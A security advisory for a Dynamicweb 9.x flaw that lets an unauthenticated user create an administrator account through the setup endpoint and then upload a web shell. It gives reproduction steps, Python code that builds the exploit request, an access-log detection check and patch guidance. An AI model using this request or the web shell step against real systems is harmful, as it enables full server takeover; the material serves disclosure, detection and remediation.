Dynamicweb Logic Flaw Allowing Unauthenticated Admin User Creation and Subsequent Remote Code Execution
Vulnerability
A vulnerability in Dynamicweb 9.x versions prior to 9.12.8 (and in the corresponding unpatched releases of the other 9.x branches listed under Remediation) allows an unauthenticated attacker to create a new administrator user. The root cause is a logic flaw in the application's handling of the setup phase: the administrator-creation action meant for initial setup is not correctly gated, so it can be invoked without authentication on an installed system. Once logged in as the newly created administrator, the attacker can upload an executable file, such as a web shell, through the application's file upload functionality and execute commands on the server.
Impact
Exploitation of this vulnerability gives an unauthenticated attacker full administrative access to the application, followed by the ability to upload files and execute commands on the server in the security context of the web application process. This amounts to a full compromise of the application and, depending on the privileges of that process, of the server hosting it.
Reproduction
To reproduce this vulnerability, send a request to the 'Admin/Access/Setup/Default.aspx' endpoint with the 'Action' parameter set to 'createadministrator', carrying the desired username, password, email, and name for the new administrator account. No authentication is required for this request. Once the administrator account has been created, log in with the new credentials and upload a web shell through the application's file upload functionality; the uploaded shell can then be used to execute commands on the server. Only test this against an instance you own or are authorised to assess, and treat any account created this way as attacker-controlled until it is removed.
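The request described above, together with a check that looks for attempts to use it in web-server access logs, as an added example; this is not code from the advisory or from Dynamicweb. The endpoint path and the 'Action' value are taken from the text. Everything else is an assumption for illustration: the form field names, that the account data travels in a POST body with 'Action' in the query string, and the IIS W3C-style log lines, which are constructed.

```python
"""
Added example, not part of the original advisory or the Dynamicweb code base.
Builds the unauthenticated administrator-creation request and scans constructed
access-log lines for attempts to use it. Runs fully offline.
"""
from urllib.parse import parse_qs, urlencode

# Endpoint path and action name as stated in the advisory.
SETUP_PATH = "/Admin/Access/Setup/Default.aspx"
CREATE_ADMIN_ACTION = "createadministrator"

# ASSUMPTION: the advisory lists the data (username, password, email, name) but
# not the exact form field names; these are placeholders.
FORM_FIELDS = {"username": "Username", "password": "Password",
               "email": "Email", "name": "Name"}


def build_create_admin_request(base_url, username, password, email, name):
    """Return the request that triggers the flaw as a dict (nothing is sent).

    ASSUMPTION: 'Action' is passed as a query parameter and the account data as
    a form-encoded POST body; the advisory only says "send a request".
    """
    url = base_url.rstrip("/") + SETUP_PATH + "?" + urlencode(
        {"Action": CREATE_ADMIN_ACTION})
    body = urlencode({
        FORM_FIELDS["username"]: username,
        FORM_FIELDS["password"]: password,
        FORM_FIELDS["email"]: email,
        FORM_FIELDS["name"]: name,
    })
    return {"method": "POST", "url": url,
            "headers": {"Content-Type": "application/x-www-form-urlencoded"},
            "body": body}


# Constructed IIS W3C-style log lines (not real traffic). Fields:
# date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs-username sc-status
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs-username sc-status
2024-02-01 10:00:01 10.0.0.5 GET /Default.aspx - 203.0.113.7 - 200
2024-02-01 10:00:09 10.0.0.5 POST /Admin/Access/Setup/Default.aspx Action=createadministrator 203.0.113.7 - 302
2024-02-01 10:00:15 10.0.0.5 POST /Admin/Default.aspx - 203.0.113.7 eviladmin 200
2024-02-01 10:01:02 10.0.0.5 GET /admin/access/setup/default.aspx action=CreateAdministrator 198.51.100.9 - 200
2024-02-01 10:02:30 10.0.0.5 GET /Admin/Access/Setup/Default.aspx Action=other 192.0.2.4 jdoe 200
2024-02-01 10:03:11 10.0.0.5 POST /Admin/Access/Setup/Default.aspx - 203.0.113.7 - 302
"""

FIELD_NAMES = ["date", "time", "s_ip", "method", "stem", "query",
               "c_ip", "user", "status"]


def parse_w3c_line(line):
    """Parse one space-separated W3C log line into a dict; None for headers/garbage."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) != len(FIELD_NAMES):
        return None
    return dict(zip(FIELD_NAMES, parts))


def find_create_admin_attempts(log_text):
    """Flag requests to the setup endpoint on an installed system.

    A hit is 'confirmed' when Action=createadministrator is visible in the query
    string (matched case-insensitively, since IIS paths are case-insensitive).
    If the attacker sends Action in the POST body it will not appear in the log,
    so any unauthenticated request to the setup endpoint is also reported, as a
    suspect hit that needs manual follow-up.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None or rec["stem"].lower() != SETUP_PATH.lower():
            continue
        qs = parse_qs(rec["query"]) if rec["query"] != "-" else {}
        actions = [v.lower() for k, vals in qs.items()
                   if k.lower() == "action" for v in vals]
        confirmed = CREATE_ADMIN_ACTION in actions
        unauthenticated = rec["user"] == "-"
        if confirmed or unauthenticated:
            hits.append({"time": rec["date"] + " " + rec["time"],
                         "client": rec["c_ip"], "method": rec["method"],
                         "user": rec["user"], "status": rec["status"],
                         "confirmed": confirmed})
    return hits


if __name__ == "__main__":
    req = build_create_admin_request("https://cms.example.com", "eviladmin",
                                     "P@ss", "attacker@example.com", "Evil Admin")
    print(req["method"], req["url"])
    print(req["body"])
    for hit in find_create_admin_attempts(SAMPLE_LOG):
        print(("CONFIRMED " if hit["confirmed"] else "SUSPECT   ") + str(hit))
```

On a patched instance the same request should be rejected; sending it after the upgrade (only against your own system) is a quick way to confirm the fix took effect. For the log check, review any administrator accounts created around the timestamps of the flagged requests.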
Remediation
Upgrade to Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9.8, 9.10.18, 9.12.8 or 9.13.0, or any later release of the respective branch. After upgrading, confirm that an unauthenticated request to 'Admin/Access/Setup/Default.aspx' with 'Action' set to 'createadministrator' no longer creates an account, and review the administrator user list and upload directories for accounts or files created before the patch was applied.
